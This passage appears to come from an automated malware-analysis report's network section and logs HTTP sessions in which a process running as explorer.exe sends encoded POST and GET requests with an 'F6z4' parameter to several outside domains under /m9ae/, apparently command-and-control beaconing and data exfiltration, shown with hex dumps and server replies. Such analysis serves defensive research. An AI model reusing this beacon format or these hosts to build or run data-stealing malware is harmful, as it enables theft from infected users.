                                                                                                                        Data Ascii: 553<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])), east=+((+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[]
                                                                                                                        Nov 29, 2022 10:36:38.341626883 CET347INData Raw: 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63
                                                                                                                        Data Ascii: )+(+!+[]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(f
                                                                                                                        Nov 29, 2022 10:36:38.341648102 CET347INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        4192.168.2.549716172.67.214.24380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:42.685957909 CET222OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.dailyheraldresearch.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.dailyheraldresearch.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.dailyheraldresearch.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6e 38 75 4b 52 72 6f 73 30 77 37 45 71 69 56 70 6f 43 5a 55 72 39 37 74 39 5a 47 50 70 7a 4e 54 76 4a 4f 41 45 6d 76 53 6c 49 4e 4c 47 6c 62 55 62 66 52 37 58 4f 4a 56 6f 59 6c 78 73 45 36 57 45 43 6b 61 64 58 33 6a 73 55 7e 4b 66 4d 62 37 65 78 37 68 32 4c 64 48 4c 37 77 34 64 63 63 72 6e 77 6b 68 65 79 44 33 50 47 77 4a 53 49 49 69 70 54 64 48 44 74 49 70 28 4d 6f 30 76 54 42 49 76 4f 5a 47 78 65 42 62 65 45 55 6f 6c 6d 47 42 69 76 43 50 28 72 69 33 32 74 41 77 37 4a 43 66 54 4d 39 5f 52 58 28 6d 6c 6c 62 4a 64 74 42 32 71 42 5a 6c 4b 57 79 32 57 34 32 30 4c 44 6f 36 6f 79 42 37 51 4e 72 57 30 77 54 74 31 4e 57 51 44 66 7a 6c 67 4b 63 46 68 6b 33 6e 63 78 4e 46 4a 6a 47 59 36 53 71 52 48 52 31 51 56 68 7a 63 79 6d 64 54 7a 72 4e 38 39 4a 33 6e 70 7a 77 55 73 70 72 70 28 58 61 68 68 6c 56 44 66 65 64 4f 50 6c 31 51 6d 2d 46 69 6b 36 57 77 34 4a 72 70 44 32 63 35 59 73 72 54 53 45 64 63 43 5a 33 51 37 53 76 4b 4c 45 6c 30 66 51 65 4b 74 47 75 6a 6a 55 68 4d 6a 47 30 4c 6d 42 72 5a 30 76 61 7a 4a 4c 72 43 67 50 79 63 6c 79 62 65 50 6b 75 5f 45 63 61 53 6a 66 76 4a 30 6d 33 30 28 70 4d 33 50 36 4f 33 34 71 58 49 34 59 51 53 77 2d 6e 47 33 6f 76 64 65 79 32 62 6b 4b 46 42 77 6d 4f 70 35 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=n8uKRros0w7EqiVpoCZUr97t9ZGPpzNTvJOAEmvSlINLGlbUbfR7XOJVoYlxsE6WECkadX3jsU~KfMb7ex7h2LdHL7w4dccrnwkheyD3PGwJSIIipTdHDtIp(Mo0vTBIvOZGxeBbeEUolmGBivCP(ri32tAw7JCfTM9_RX(mllbJdtB2qBZlKWy2W420LDo6oyB7QNrW0wTt1NWQDfzlgKcFhk3ncxNFJjGY6SqRHR1QVhzcymdTzrN89J3npzwUsprp(XahhlVDfedOPl1Qm-Fik6Ww4JrpD2c5YsrTSEdcCZ3Q7SvKLEl0fQeKtGujjUhMjG0LmBrZ0vazJLrCgPyclybePku_EcaSjfvJ0m30(pM3P6O34qXI4YQSw-nG3ovdey2bkKFBwmOp5g).
                                                                                                                        Nov 29, 2022 10:34:43.030292988 CET223INHTTP/1.1 405 Method Not Allowed
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:43 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Allow: GET, HEAD
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QcMkuBt98wdA6W8QC3yxPQumFmQa%2BiGjpWbrglDG%2Fd2W5BLHHwgDgsFBOyy51IouOJUa%2F02i1DQp7nx9G6mhYF7H7CilVasL0MBvsWxldMuWrqG2cEjwO4vJeQFzpRV5NAFB9BA4hClfatQHWnY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 771a595ccb119bcb-FRA
                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                        Data Raw: 39 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: 9a<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                        Nov 29, 2022 10:34:43.030323029 CET223INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        40192.168.2.54975674.208.236.21480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:43.528492928 CET349OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.spirituallyzen.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.spirituallyzen.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.spirituallyzen.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 31 63 30 59 63 2d 4b 61 44 61 49 38 6f 33 4b 47 76 33 6a 69 36 53 55 58 67 39 65 54 42 44 4e 6e 69 39 64 5f 58 68 66 63 6f 44 72 48 62 66 32 6a 32 7a 4a 35 46 71 4d 62 36 43 70 73 41 32 52 51 52 48 33 53 63 43 31 38 70 78 61 50 4a 58 55 68 54 59 5a 6c 58 48 64 48 6a 4c 53 63 28 36 56 46 6d 46 30 4f 32 7a 72 75 6d 47 62 4d 30 6b 57 53 62 55 41 50 39 39 34 42 4c 66 47 57 59 6e 79 4e 52 6b 76 47 6c 43 33 72 6c 75 78 63 68 44 39 6e 67 62 30 38 71 42 79 62 59 49 77 62 77 44 75 2d 47 4f 77 2d 4a 6f 49 52 35 45 63 71 42 4a 51 65 6b 4c 33 76 28 33 28 49 34 72 67 38 68 5f 6b 50 44 79 38 5a 34 32 43 77 39 69 68 38 54 6f 32 56 74 39 49 36 54 63 63 5f 79 73 33 4d 37 56 59 58 79 65 43 32 30 30 74 46 37 6b 7a 56 74 73 38 33 47 61 72 70 4b 72 33 7a 69 53 6b 65 4a 55 76 34 32 53 6b 76 67 64 6a 71 6b 57 6f 42 64 31 4d 51 44 37 50 4f 69 38 50 52 54 33 7e 4d 38 76 48 30 56 33 79 52 64 54 28 66 54 30 61 4b 4b 78 67 49 36 6b 71 57 57 69 73 36 76 51 6a 64 69 61 72 49 30 57 39 5a 63 6c 74 7a 41 41 34 63 64 5f 38 36 28 30 4a 4c 52 4e 4b 44 4e 54 63 43 72 55 42 6e 6c 35 28 2d 35 32 61 62 34 31 6c 53 7a 66 7a 36 4e 43 36 30 73 4b 76 6a 4c 4e 68 71 31 30 62 4f 62 5f 65 4a 77 65 6c 55 58 4c 33 77 54 45 6e 55 44 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=1c0Yc-KaDaI8o3KGv3ji6SUXg9eTBDNni9d_XhfcoDrHbf2j2zJ5FqMb6CpsA2RQRH3ScC18pxaPJXUhTYZlXHdHjLSc(6VFmF0O2zrumGbM0kWSbUAP994BLfGWYnyNRkvGlC3rluxchD9ngb08qBybYIwbwDu-GOw-JoIR5EcqBJQekL3v(3(I4rg8h_kPDy8Z42Cw9ih8To2Vt9I6Tcc_ys3M7VYXyeC200tF7kzVts83GarpKr3ziSkeJUv42SkvgdjqkWoBd1MQD7POi8PRT3~M8vH0V3yRdT(fT0aKKxgI6kqWWis6vQjdiarI0W9ZcltzAA4cd_86(0JLRNKDNTcCrUBnl5(-52ab41lSzfz6NC60sKvjLNhq10bOb_eJwelUXL3wTEnUDA).
                                                                                                                        Nov 29, 2022 10:36:43.660981894 CET350INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:43 GMT
                                                                                                                        Server: Apache
                                                                                                                        X-Frame-Options: deny
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 239TMo@WLP@qzCP*c{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzR*R6PF&CB+ZdQ.PTY&,vPDX*9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <|Gz&*Ls:T:`O])-:RFBW+}c_Q0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        41192.168.2.54975774.208.236.21480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:45.692920923 CET351OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.spirituallyzen.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.spirituallyzen.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.spirituallyzen.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 31 63 30 59 63 2d 4b 61 44 61 49 38 70 47 4b 47 76 47 6a 69 70 53 55 58 72 64 65 5a 42 44 4d 76 69 39 64 37 58 68 32 48 70 77 4c 48 62 4f 47 6a 33 41 68 35 49 4b 4d 55 6f 69 70 6f 4f 57 51 4b 52 48 33 6f 63 43 4a 38 70 31 79 50 4a 54 51 68 54 72 68 6d 57 48 64 46 68 4c 53 66 37 36 56 51 6d 46 34 61 32 7a 48 75 6d 41 48 4d 33 58 7e 53 62 41 67 4f 34 64 34 4d 4f 66 47 56 52 48 79 37 52 6b 75 6e 6c 43 33 4e 6c 74 4a 63 67 7a 74 6e 79 70 4d 37 67 42 79 61 62 49 78 72 34 6d 54 49 4e 64 6f 4d 45 61 74 41 6b 6e 68 49 4d 37 35 43 28 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=1c0Yc-KaDaI8pGKGvGjipSUXrdeZBDMvi9d7Xh2HpwLHbOGj3Ah5IKMUoipoOWQKRH3ocCJ8p1yPJTQhTrhmWHdFhLSf76VQmF4a2zHumAHM3X~SbAgO4d4MOfGVRHy7RkunlC3NltJcgztnypM7gByabIxr4mTINdoMEatAknhIM75C(A).
                                                                                                                        Nov 29, 2022 10:36:45.825123072 CET352INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        X-Frame-Options: deny
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 239TMo@WLP@qzCP*c{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzR*R6PF&CB+ZdQ.PTY&,vPDX*9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <|Gz&*Ls:T:`O])-:RFBW+}c_Q0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        42192.168.2.54975974.208.236.21480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:47.844528913 CET359OUTGET /m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.spirituallyzen.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:36:47.974574089 CET360INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 1271
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        X-Frame-Options: deny
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/'
                                                                                                                        Nov 29, 2022 10:36:47.974608898 CET360INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 22 3e 27 0a 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        43192.168.2.549760188.114.97.380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:37:06.291654110 CET362OUTGET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.oonrreward.xyz
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:37:06.448113918 CET363INHTTP/1.1 302 Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:37:06 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Powered-By: PHP/7.1.33-50+ubuntu20.04.1+deb.sury.org+2
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Access-Control-Allow-Origin: http://www.oonrreward.xyz
                                                                                                                        Location: http://oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0
                                                                                                                        CF-Cache-Status: DYNAMIC
